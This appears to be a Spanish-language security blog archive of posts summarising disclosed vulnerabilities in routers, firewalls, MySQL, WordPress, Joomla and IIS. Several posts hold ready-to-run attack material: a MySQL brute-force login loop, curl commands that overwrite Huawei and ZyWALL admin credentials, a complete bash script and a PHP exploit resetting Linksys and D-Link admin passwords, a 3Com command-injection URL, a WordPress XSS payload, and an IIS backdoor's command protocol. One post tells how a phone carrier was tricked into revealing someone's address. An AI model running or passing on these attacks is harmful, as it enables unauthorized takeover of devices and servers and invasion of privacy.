Archivo

Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas
Mostrando entradas con la etiqueta Hacking. Mostrar todas las entradas

sábado, 16 de junio de 2012

Authentication bypass x2


     Aquí les dejo dos tips, que te permitirá ingresar a cuentas privilegiadas sin conocer sus respectivas passwords, ambos ataques pueden ser remotos y solo requieren tipear una sola linea en consola.

Caso MySQL/MariaDB: Acceder como root sin conocer el password

     Hace unos dias se hizo publico que aplicando fuerza bruta se puede acceder a cualquier cuenta determinada en ciertas versiones de MySQL/MariaDB, solo necesitamos conocer el nombre de usuario de la cuenta a brutear, los mas codiciosos intetarán con "root" (es muy comun encontrarlo habilitado), pero tranquilamente podes intentar con cualquier otro usuario

$ while [ 1 ];do mysql -u root --password=123; done

No demora mucho el proceso, ya que la posibilidad de acierto es de 1 en 256 intentos

Para mas información:
http://www.net-security.org/secworld.php?id=13076

 

Caso Huawei HG866: Acceder como administrador sin conocer el password

     Se puede modificar la clave del administrador en el panel de control web de los router Huawei HG866 ya que la sesión de la pagina password.html no se encuentra debidamente controlada

$ curl --data "psw=qwerty&reenterpsw=qwerty" http://<ip-router>/html/password.html

Con la linea anterior pisamos la contraseña (desconocida) del administrador por la clave "qwerty" (que dificilmente olvidaremos =)

Para mas información:
http://websec.mx/advisories/view/Evasion_de_autenticacion_en_Huawei_HG866

viernes, 19 de agosto de 2011

Creando una Backdoor silenciosa en IIS


     Imaginemos un hipotético caso, donde se halla comprometido un servidor Windows con IIS, ahora el atacante tiene que realizar un ultimo "retoque" al servidor para poder asegurarse futuros accesos, en otra palabras, el chico malo instalara una backdoor.

     Internet Information Service es uno de los servidores webs de Microsoft, y uno de los mas populares que existen en la red de redes, IIS viene acompañado de APIs especiales, para hacerle la vida mas amena al desarrollador, estas herramientas son las famosas ISAPI (Internet Server Application Programming Interface).

     ISAPI cuenta con dos tipos de componentes:

  • Extensiones: son aplicaciones que corren sobre IIS y pueden ser accedidas de la misma manera que las paginas estáticas, p.e. http://<web>/<extencion>
  • Filtros: permiten realizar mejoras a las funcionalidades de IIS, siempre serán ejecutadas por el servidor filtrando cada petición (http) que se realice en el mismo


     Una interesante forma de crear una backdoor en IIS es hacer uso de estos Filtros, y no utilizar Extensiones porque son "mas ruidosas" ya que se debería utilizar una URL especifica cada vez que queramos hacer uso de nuestra backdoor, la cual quedaría registrada en los logs. En cambio, al utilizar filtros no es necesario acceder a una URL fija, sino que, al llamar a cualquier pagina del servidor con una petición especial nuestra backdoor entraría en funcionamiento.

     Veamos como estan organizados internamente los filtros en la memoria del servidor ...


para implementar la backdoor, básicamente julien propone agregar un nuevo filtro que este a la espera de una peticion especial y disparar la dll que hayamos cargado previamente.




entonces, al realizar una petición a una web cualquiera del servidor comprometido, p.e. http://<web>/pwet.html la respuesta del servidor seria ...
GET /pwet.htm HTTP/1.1
Host: 192.168.73.143
Accept-Encoding: identity
Connection: Keep-Alive
Content-type: application/x-www-form-urlencoded
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 12:16:50 GMT
Content-Length: 31
Content-Type: text/html
Last-Modified: Mon, 21 Jun 2010 11:53:19 GMT
Accept-Ranges: bytes
ETag: "963779573811cb1:994"
Server: Microsoft-IIS/6.0
<html>
Pouetpouet
</html>
hasta aquí, nada raro... pero ahora realicemos una nueva petición a la misma pagina, pero esta vez mandaremos nuestra cabecera especial, de forma tal que el filtro la encuentre y nos de una respuesta, en el ejemplo de abajo, mandaremos la orden ListDir (X-Order: ListDir) y especificaremos el parámetro C:\ (X-Data: Qzpc) codificado en Base64 =)
GET /pwet.htm HTTP/1.1
Host: 192.168.73.143
Accept-Encoding: identity
X-Order: ListDir
Connection: Keep-Alive
X-Data: Qzpc
Content-type: application/x-www-form-urlencoded
Accept: */*

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 12:16:57 GMT
Content-Length: 353
X-Resp: OK
Content-Type: text/html
Last-Modified: Mon, 21 Jun 2010 11:53:19 GMT
Accept-Ranges: bytes
ETag: "963779573811cb1:994"
Server: Microsoft-IIS/6.0
<html>
Pouetpouet
</html>
[F] C:\AUTOEXEC.BAT
[F] C:\boot.ini
[F] C:\bootfont.bin
[F] C:\CONFIG.SYS
[D] C:\Documents and Settings
[D] C:\Inetpub
[F] C:\IO.SYS
[F] C:\MSDOS.SYS
[F] C:\NTDETECT.COM
[F] C:\ntldr
[F] C:\pagefile.sys
[D] C:\Program Files
[D] C:\System Volume Information
[D] C:\WINDOWS
[D] C:\wmpub

Para mas información:

http://esec-lab.sogeti.com/post/2011/02/02/IIS-Backdoor
http://technet.microsoft.com/es-es/library/cc733109(WS.10).aspx

viernes, 5 de agosto de 2011

Hacking WordPress


     Tim Thumb es una herramienta que permite generar thumbnails (pre-visualizaciones de imágenes) y es ampliamente utilizada por numerosos themes de WordPress, esta herramienta presenta una falla que permite subir binarios maliciosos (en el caso de Marck Maunder le subieron la shell Alucar) y tomar el control de una web vulnerable.

     Para explotar la vulnerabilidad, un atacante aprovecha la funcionalidad de Tim Thumb para cachear imágenes, la cuales son alojadas en un directorio con permiso de lectura. Entonces, el atacante solo debe crear un archivo malicioso e indicarle a timthumb.php que lo recoja remotamente, y este lo cacheara en el  webroot del sitio atacado.

     Una forma rápida de obtener un listado de archivos vulnerables es la siguiente:
# find . -name '*thumb.php' -exec ls -l {} \; > list.txt
     El resultados de la linea anterior debería ser actualizado con la ultima version que se puede descargar desde aqui http://code.google.com/p/timthumb/

Para mas información ...

http://markmaunder.com/2011/zero-day-vulnerability-in-many-wordpress-themes/
http://markmaunder.com/2011/technical-details-and-scripts-of-the-wordpress-timthumb-php-hack/
http://www.darknet.org.uk/2011/08/zero-day-vulnerability-in-timthumb-image-utility-threatens-many-wordpress-sites/

jueves, 5 de mayo de 2011

Bypaseando un Firewall (ZyWALL)


     Un poco amarillista el titulo jeje.. se trata del firewall ZyWALL USG, que por cierto esta bien equipado, cuenta con un antivirus, antispam, sistema detección y prevencion (IDP), SPI, etc. etc...

     Este equipo cuenta con una interfaz web para hacer mas amigable su administración, la interfaz esta montada sobre un servidor Apache que tiene un modulo personalizado (mod_auth_zyxeil.so) que implementa la autenticación, y aquí hay algo interesante; algunas direcciones como /images/ /weblogin.cgi /language están configuradas con la directiva "AuthZyxelSkipPattern", esto significa que pueden ser accedidas sin autenticación, vamos bien hasta ahí? ok.. También existe un archivo llamado startup-config.conf que contiene entre otras cosas usuarios y contraseñas (hasheados).

     Así que, para ir "hilando" un poco veamos el ataque o mejor dicho el PoC que hicieron los investigadores de RedTeam, lo primero que hacen es descargarse el archivo startup-config.conf haciendo referencia a /images (de esta forma evitamos autenticarnos)
$ curl --silent -o startup-config.conf "https://192.168.0.1/cgi-bin/export-cgi/images/?category=config&arg0=startup-config.conf"

una vez con este archivo en nuestro poder, agregamos a mano un nuevo usuario y contraseña (hasheados), y subimos nuevamente el archivo de configuración, (aprovechando la configuracion del Apache, forzamos el upload). De esta manera ya podremos loguearnos con nuestra nueva cuenta ^_^

$ curl --silent -F ext-comp-1121=50 -F file_type=config -F nv=1 -F "file_path=@startup-config.conf;filename=startup-config.conf" https://192.168.0.1/cgi-bin/file_upload-cgi/images/

     Los modelos afectados son USG-20, USG-20W, USG-50, USG-100, USG-200, USG-300, USG-1000, USG-1050, y USG-2000. El vendedor ya libero el parche le 25 de Abril y solo hay q actualizar el firmware (los anteriores a esta fecha  se encuentran afectados)


Para mas información ...

http://www.redteam-pentesting.de/en/advisories/rt-sa-2011-003/-authentication-bypass-in-configuration-import-and-export-of-zyxel-zywall-usg-appliances
http://www.redteam-pentesting.de/en/advisories/rt-sa-2011-004/-client-side-authorization-zyxel-zywall-usg-appliances-web-interface

miércoles, 2 de marzo de 2011

Resetear la clave del router Linksys Cisco Wag120n


     Sin necesidad de ningún tipo de credenciales ni logueo previo, es posible cambiar la clave del administrador (entre otras cosas =) del router Linksys Wag120n, al ver el exploit de los chicos de ircrash me dieron ganas de hacer mi propia versión en bash (hace muuucho q no hago nada con este lenguaje scripting).

     Como siempre digo, sean libres de modificarlo a gusto y a portarse bien, sean chicos buenos ~(8(|)


#!/bin/bash
#
# Este script cambiara la clave de administrador
# del router Linksys Wag120n por el password pasado 
# por parametro.
#
# Ej: $./linksyspwn 192.168.1.1 qwerty
#
# www.e-videncia.com.ar
# by Mario Corvalan - Marzo 2011
#
param=(
"-F \"user_list=1\"
-F \"h_user_list=1\"
-F \"sysname=admin\"
-F \"remote_management=enable\"
-F \"http_wanport=8080\"
-F \"upnp_enable=enable\"
-F \"wlan_enable=enable\"
-F \"igmp_proxy_enable=enable\"
-F \"save=Save+Settings\"
-F \"h_pwset=yes\"
-F \"sysname_changed=yes\"
-F \"pwchanged=yes\"
-F \"pass_is_default=false\"
-F \"h_remote_management=enable\"
-F \"pass_is_none=no\"
-F \"h_upnp_enable=enable\"
-F \"h_wlan_enable=enable\"
-F \"h_igmp_proxy_enable=enable\"
-F \"todo=save\"
-F \"this_file=Administration.htm\"
-F \"next_file=Administration.htm\"
-F \"message=\"
-F \"h_wps_cur_status=\""
)
if [ $# != 2 ]
then
echo "Ejecutar: ./dlinkpwn.sh <ip> <new_pass>"
exit 1
fi
curl -F "sysPasswd=$2" -F "sysConfirmPasswd=$2" `echo ${param[0]}` http://$1/setup.cgi




Para mas información ...

http://ircrash.com/
http://www.exploit-db.com/exploits/16252/

domingo, 6 de febrero de 2011

HTC Peep: Robo de credenciales


     HTC Peep es el cliente de Twitter en los dispositivos HTC, esta aplicación cuando realiza la conección con el servidor de Twitter envía el nombre de usuario y contraseña en texto claro, pudiendo ser vistos facilmente por cualquier atacante q este escuchando ese canal (eavesdropping), la segunda vulnerabilidad q expone nuestra información, esta relacionada con la forma en q la aplicación guarda nuestro datos de logueo para realizar transacciones en los servidores de Twiter, resulta q HTC Peep los reenvía codificados con Base64, como se muestra en la imagen de abajo ..

     No es ningún secreto como decodificar esta información, solo basta con una linea de comando y listo, ya podemos ver el usuario hackingmobile y su correspondiente contraseña megasecretpass


$ echo -ne "aGFja2luZ21vYmlsZTptZWdhc2VjcmV0cGFzcw==" | base64 -d
hackingmobile:megasecretpass


     Es una lastima q HTC aun no haya liberado ningún parche oficial, ya q la gente Taddong informo sobre estas vulnerabilidades hace seis meses atrás. Los modelos afectados son HD2, T-Mobile, Topaz, Rhodim, y HD Mini.



Para mas información ...

http://blog.taddong.com/2011/02/vulnerability-in-htc-peep-twitter.html

miércoles, 2 de febrero de 2011

Firmware 3.56 de PlayStation desbloqueado en menos de 24hs


     Recientemente leía en varios blogs, la disconformidad de usuarios de PS3 ya que al actualizar al firmware 3.56 se dan con la no grata noticia de que contiene un rootkit, que permite a la gente de Sony ejecutar código remoto cuando se les cante (bueno siempre estén conectados a la red de la PS), y se discute cuan legal es esto, ya que, la empresa puede escaner tu consola en busca de archivos específicos y/o software no autorizados, enviándose reportes a si mismos (un intento de detener el jailbreak).

     Pues, no paso ni un día de esta actulización y ya hay noticias de q este firmware fue desbloqueado por el hacker Alaloui,  quien ha liberado herramientas para descubrir las nuevas claves de esta nueva versión, algo similar hizo George Hotz con la version 3.55 quien ahora tiene serios problemas legales.


Para mas información ...

http://www.jailbreakscene.com/2011/01/official-ps3-firmware-v356-has-rootkit.html
http://www.theregister.co.uk/2011/02/01/ps3_hacked_again/

lunes, 31 de enero de 2011

Multiples vulnerabilidades en Routers/Firewalls 3Com OfficeConnect


     Este tipo de dispositivo tiene algunas fallas de seguridad bastantes criticas, comenzando por cuentas ocultas que vienen por defecto, es decir cualquier usuario podría loguearse con los siguientes usuarios/contraseñas: support/support, user/5 y nobody/admin.

     También es propenso a la ejecución de código remoto sin necesidad de estar logueados, p.e. para reiniciarlo basta con mandar la siguiente petición: 

     http://1.2.3.4/utility.cgi?testType=1&IP=aaa || reboot


Para mas información ...

http://www.andreafabrizi.it/?exploits:3com_officeconnect

lunes, 3 de enero de 2011

Claves HardCodeadas (SSL)



     Muchos routers contienen hardcodeadas las claves SSL en sus firmware, esto significa que para desencriptar trafico de un router con un firmware determinado, el atacante debería conseguir ese firmware (de la pagina del fabricante) y extraer de allí la clave SSL.

     El ataque tiene sus limitaciones en cuanto a los distintos "sabores" de firmware que utiliza un mismo router, pero existe una herramienta llamada LittleBlackBox q facilitara la identificaion, y la obtención de certificados publicos, el proyecto se encuentra en Google Code.

Para mas información ...
http://code.google.com/p/littleblackbox/
http://www.devttys0.com/2010/12/breaking-ssl-on-embedded-devices/
http://seclists.org/bugtraq/2010/Dec/192

jueves, 30 de diciembre de 2010

XSS en Wordpress 3.0.3


    El investigador Saif El Sherei, acaba de reportar una vulnerabilidad de Cross Site Scripting  q se encuentra en la versión de Wordpress 3.0.3, y afecta a usuarios q utilicen IE6, IE6 y Netscape 8.1
     Se recomienda actualizar a la ultima versión 3.0.4 q se encuentra en la pagina oficial WordPress , también recomiendo no utilizar IE, ah..no me creen? visiten http://crashie8.com/ y veran :o)

      Más abajo podemos ver como se utiliza la variable content de una peticion POST para explotar la vulnerabilidad.

 POST /wordpress/wp-admin/post.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.15)
Gecko/2009102814 Ubuntu/8.10 (intrepid) Firefox/3.0.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Proxy-Connection: keep-alive
Referer:
http://127.0.0.1/wordpress/wp-admin/post.php?post=145&action=edit&message=1
Cookie:
wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C17562b2ebe444d17730a2bbee6ceba99;
wp-settings-time-1=1293196695; wp-settings-time-2=1293197912;
wp-settings-1=m3%3Dc%26editor%3Dhtml; wp-settings-2=editor%3Dhtml%26m5%3Do;
wp-settings-time-3=1293462654; wp-settings-3=editor%3Dhtml;
wordpress_test_cookie=WP+Cookie+check;
wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=xss%7C1293636697%7C7437e30b3242f455911b2b60daf35e48;
PHPSESSID=a1e7d9fcce3d072b31162c4acbbf1c37;
kaibb4443=80bdb2bb6b0274393cdd1e47a67eabbd;
AEFCookies2525[aefsid]=kmxp4rfme1af9edeqlsvtfatf4rvu9aq
Content-Type: application/x-www-form-urlencoded
Content-Length: 1655
_wpnonce=aad1243dc1&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&user_ID=3&action=editpost&originalaction=editpost&post_author=3&post_type=post&original_post_status=publish&referredby=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&_wp_original_http_referer=http%3A%2F%2F127.0.0.1%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D145%26action%3Dedit%26message%3D1&post_ID=145&autosavenonce=e35a537141&meta-box-order-nonce=718e35f130&closedpostboxesnonce=0203f58029&wp-preview=&hidden_post_status=publish&post_status=publish&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=12&jj=27&aa=2010&hh=15&mn=31&ss=55&hidden_mm=12&cur_mm=12&hidden_jj=27&cur_jj=27&hidden_aa=2010&cur_aa=2010&hidden_hh=15&cur_hh=16&hidden_mn=31&cur_mn=02&original_publish=Update&save=Update&post_category%5B%5D=0&post_category%5B%5D=1&tax_input%5Bpost_tag%5D=&newtag%5Bpost_tag%5D=&post_title=&samplepermalinknonce=ffcbf222eb&content=%3CIMG+STYLE%3D%22xss%3Aexpression%28alert%28%27XSS%27%29%29%22%3E&excerpt=&trackback_url=&meta%5B108%5D%5Bkey%5D=_edit_last&_ajax_nonce=257f6f6ad9&meta%5B108%5D%5Bvalue%5D=3&meta%5B111%5D%5Bkey%5D=_edit_lock&_ajax_nonce=257f6f6ad9&meta%5B111%5D%5Bvalue%5D=1293465765&meta%5B116%5D%5Bkey%5D=_encloseme&_ajax_nonce=257f6f6ad9&meta%5B116%5D%5Bvalue%5D=1&meta%5B110%5D%5Bkey%5D=_wp_old_slug&_ajax_nonce=257f6f6ad9&meta%5B110%5D%5Bvalue%5D=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=61de41e725&advanced_view=1&comment_status=open&ping_status=open&add_comment_nonce=c32341570f&post_name=145

Actualizado...
WordPress 3.0.4 tambien es vulnerable a un XSS similar, solo q para explotarlo se necesita una cuenta de editor y la variable a inyectar es "comment"

Para mas información ...

http://www.exploit-db.com/exploits/15858/

miércoles, 1 de diciembre de 2010

No todo es lo que parece


     Debido a un problema (mas bien confusión) con la internacionalizacion de nombres de dominios, muestro cuatro pares de dominio como ejemplo de un posible fraude, debido a la similitud de las letras en diferentes codificaciones, un atacante podría aprovechar esto para re-direccionar trafico a una web falsa como se muestra a continuacion (copien y peguen en su navegador y vean las diferencias =)

fake  -->    www.bаnsud.com
buena -->   www.bansud.com


fake  -->    www.fаcebook.com 
buena -->   www.facebook.com


fake  -->    www.hotmаil.com

buena -->   www.hotmail.com



fake  -->    evidenciаsecurity.blogspot.com

buena -->   evidenciasecurity.blogspot.com


     Si bien los dominios "parecen" iguales, pues no; son diferentes debido a q se encuentran mezclados los caracteres ASCII con no ASCII, les dejo la incognita a ver si encuentran la letra q no es latina (pueden copiar y pegar en google las direcciones :o)

     Bueno despues de ver esto, espero q la proxima vez de realizar "clics"  a todo lo q se mueva, recuerden q un link  les podria estar dirigiendo a cualquier lugar del cyberespacio, y no sean vagos, escriban uds las direcciones!! ~( 8(|)

viernes, 26 de noviembre de 2010

Mi amigo... "El Hacker sin computadora"


     Lo que les voy a contar es la manera de obtener información personal desde una compañía de telefonia celular (en este caso fue Claro Argentina), para realizar el cometido no hizo falta realizar complejas consultas SQLi, ni correr un exploit 0 day, ni snifear redes, ni nada por el estilo. Esto lo realizo un amigo que no tiene la mas pálida idea de tecnología ni mucho menos de seguridad.

     Resulta que, lo llamemos el "Sr. X" (mi amigo), se vio en la necesidad de encontrar a una persona (por problemas de polleras :o)  y el único dato q tenia era su nro. de celular, pues bien Uds. dirán "y porque no le manda un mensajito o lo llama para encontrarse", simplemente no lo podía hacer x q la otra persona no quería ser "encontrada", no contestaba los sms y apagaba el celular cuando lo llamaba.

     Cuando me contaba lo sucedido, se me vino a la cabeza el articulo de encontrar una persona a través de su email pero no era este el caso, también se m ocurrió el geoposicionamiento por gsm, pero tampoco esta era la situación, resulta q el Sr. X encontró la solución de una forma menos técnica y con simple ingeniería social, al mejor estilo Mitnick.

     El Sr. X noto que al llamar le respondía la contestadora de Claro (el celular se encontraba apagado), así q simplemente recogió su boleta y la de su sobrino (ambos son clientes de la misma empresa), y fue a la agencia para realizar un reclamo porque supuestamente "no le llega la factura a su domicilio", cabe aclarar q entre este reclamo también dio el numero del celular en discordia, la operadora muy gentilmente le informa q los domicilios de los dos primeros números son correctos, pero el "tercer nro" tiene la dirección *********** y le pregunto si había cambiado de domicilio XD

     Queria compartir esta historia real de hack sin tecnologia, y bueno, así de simple, sin rootear el server, ni vulnerar ninguna bbdd (q podría llevar días, semanas o hasta meses, dependiendo q tanta saña le lleguemos a tener =) el tiempo que le llevo al Sr X fueron 30 minutos de fila para que lo atiendan ^_^

domingo, 14 de noviembre de 2010

(off topic) Hackeando Casinos



      Aqui les dejo un lindo video, seria algo asi como "hacking de baja tecnologia", no pretendo fomentar el juego ni mucho menos, solo estoy mostrando una historia real de un jugador experto de BlackJack, y no un simple amateur o jugador aficionado q va a tirar plata a los casinos.

     Tommy Hyland estudio el juego por varios años, leyo libros y formo su propio equipo de jugadores, todo lo q hizo no fue de la noche a la mañana, el estudio le llevo 2 años, algo similar paso con la familia Pelayo, que antes de jugar en serio, hicieron todo un estudio por 5 años.

     Obviamente los casinos no estaban preparados para una persona q utilice las matematicas (y su cerebro) a su favor; esto le trajo a Tommy y a su equipo muchos problemas legales y hasta la expulsion de los casinos. Sin mas q decir, una historia de perseverancia, estudio y trabajo en equipo.

     Aqui les dejo los links del video completo

http://www.youtube.com/watch?v=T53-lXGkhu4&feature=related
http://www.youtube.com/watch?v=3ZWbd5Oy2x8&feature=related
http://www.youtube.com/watch?v=ocfLgWGlO0M&feature=related
http://www.youtube.com/watch?v=CF77dPqpdnM&feature=related
http://www.youtube.com/watch?v=8lh5aKng_mw&feature=related

viernes, 12 de noviembre de 2010

Multiples vulnerabilidades corregidas en ProFTPd (<=) 1.3


     Fueron encontradas y corregidas multiples vulnerabilidades en el paquete ProFTP, que permitía a un atacante crear y borrar directorios (entre otras cosas) mediante un directory transversal, también es posible la ejecucion de codigo arbitrario haciendo un baffer overflow en la función pr_netio_telnet_gets (en netio.c). Para los q utilizamos este tipo de servicio, ya estan disponible las actualizaciones

Para mas información ...

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-3867
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-4221
http://www.linuxsecurity.com/content/view/153705?rdf

jueves, 11 de noviembre de 2010

Reconfigurar Router D-Link sin conocer password


     Hace unos dias Karol Celiński (Celin) publico la manera de resetear el usuario y password del router D-Link DIR-300 y de esta forma ganarnos el panel de control web, hasta el momento no hay respuesta por parte del vendedor.


     Aqui les dejo exploit (para q lo estudien, obvio ;)

<?php
if(sizeof($argv)!=4) {
   echo "Usage: php5 $argv[0] <router ip addres> <port>
   <admin password>\n";
   exit;
}
$ch=curl_init();
curl_setopt($ch, CURLOPT_URL, "http://".$argv[1]."/tools_admin.php";);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_PORT, $argv[2]);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch,
CURLOPT_POSTFIELDS,"ACTION_POST=LOGIN&LOGIN_USER=a&LOGIN_PASSWD=b&
login=+Log+In+&NO_NEED_AUTH=1&AUTH_GROUP=0&admin_name=admin&admin_password1="
.urlencode($argv[3]));
echo "+ starting request\n";
$out = curl_exec($ch);
if($out===false) {
   echo "- Error: could not connect (
   http://$argv[1]:$argv[2]/tools_admin.php).\n";
   exit;
} else
echo "+ request sended\n";
curl_close($ch);
if(stripos($out,"login.php")===true) {
   echo "- something goes wrong (check answer - answer.html) !\n";
   $f=fopen("answer.html","w"); fwrite($f,$out); fclose($f);
   exit;
}
else
   echo "+ ok, now you can login using l: admin p:$argv[3]\n";
?>
Para mas información ...
 
http://seclists.org/bugtraq/2010/Nov/94 

viernes, 5 de noviembre de 2010

SQLi en Joomla <= 1.5.21

     La gente de Joomla! finalmente parchea el bug q reporto YGN Ethical Hacker Group el 06/10/2010, q permite la ejecución de SQL Injection, esto se debe a q los parámetros filter_order y filer_order_Dir no fueron debidamente saneadas.

     Veamos algunos screenshot de las pruebas d concepto:

 PoC 1

PoC 2



     Visto los PoC's y liberado el patch, solo resta, ACTUALIZAR!!!

Para mas información ...

http://yehg.net/lab/pr0js/advisories/joomla/core/%5Bjoomla_1.5_21%5D_sql_injection

sábado, 30 de octubre de 2010

Atacar el protocolo mas seguro de WiFi... WPA2 (Hole 196)

     Cualquier persona que utilize WiFi, se sentira tranquilo con WPA2, ya que actualmente es el protocolo mas robusto y seguro en cuanto a encriptación y autenticación inhalambricas se refiere, pero esto puede cambiar con el tiempo, avecinado dos de las conferencias mas importantes de seguridad (Black Hat y DEFCON) ya se encuentran haciendo "ruido" de que mostraran una vulnerabilidad en el protocolo WPA2.

     El investigador que descubrio esta falla, Md Sohail Ahmad, dice que para explotar esta vulnerabilidad, WPA2 no fue crackeado ni se utiliza fuerza bruta, sino que el mismo estandar (IEEE 802.11) permite que todos los clientes reciban trafico broadcast desde el AP usando una clave comun y esto es lo que da lugar a la vulnerabilidad, cuando un usuario utiliza esta clave en un modo reverso, enviando y espoofeando paquetes encriptados.

     Entonces para poder explotar esta vulnerabilidad el atacante debe estar adentro de la red (empleado mal intencionado) quien podria desencriptar los paquetes transmitidos por otros dispositivos en el aire e inyectar trafico mailcioso en la red, al mejor estilo de MITM (aunque algo exajerado esta comparacion, pero se entiende :), hasta aqui me parece poco practico este tipo de ataque porque, considerando que el atacante se encuentra adentro podria utilizar tecnicas mucho mas sencillas y rápidas, pero bueno, vale.

     Como explica en darknet, WPA2 utiliza dos tipos de claves, PTK (Pairwise Transient Key) el cual es unico para cada cliente, y GTK (Group Temporal Key) que se utiliza para enviar trafico broadcast. PTK cuenta con la propiedad de poder detectar spoofing y datos extraños, mientras que GTK no lo hace, y esto se encuentra documentado en la pagina 196 del estandart IEEE 802.11 (de alli que proviene el nombre "Hole 196")

    Mirando parte del estandar IEEE 802.11 en la pagina 196 (como dice el autor) y mas especificamente en la seccion 8.5, una nota dice textualmente:

"Pairwise key support with TKIP or CCMP allows a receiving STA to detect MAC address spoofing and data forgery. The RSNA architecture binds the transmit and receive addresses to the pairwise key. If an attacker creates an MPDU with the spoofed TA, then the decapsulation procedure at the receiver will generate an error. GTKs do not have this property."
En la seccion download se puede descargar el estandar IEEE 802.11 completo (.pdf), y por lo pronto solo queda esperar, para ver lo que se exponga en la DEFCON y BlackHat

Para mas información ...
http://www.darknet.org.uk/2010/07/wpa2-vulnerability-discovered-hole-196-a-flaw-in-gtk-group-temporal-key/

Reconfigurar Routers D-Link sin conocer el password

     La visualización y edición de la configuracion de estos routers es posible "gracias" a una segunda interface de administracion q cuenta con una autenticacion muy basica q puede ser saltada  facilmente por un atacante.

     Esta segunda interface hace uso del protocolo HNAP (Home Network Administration Protocol) la cual permite reconfigurar el router D-Link sin necesidad de tener credenciales d administrador. La vulnerabilidad puede ser aprovechada directamente por un atacante q se encuentre en la red local, como también, de forma indirecta, por un atacante q se encuentre fuera de la red (medante el ataque DNS rebinding).

    Por el momento los investigadores de SourceSec confirmaron que las versiones vulnerables son DI-524, DIR-628 y DIR-655 (puediendo haber mas)

Para mas información ...
http://www.sourcesec.com/2010/01/09/d-link-routers-one-hack-to-own-them-all/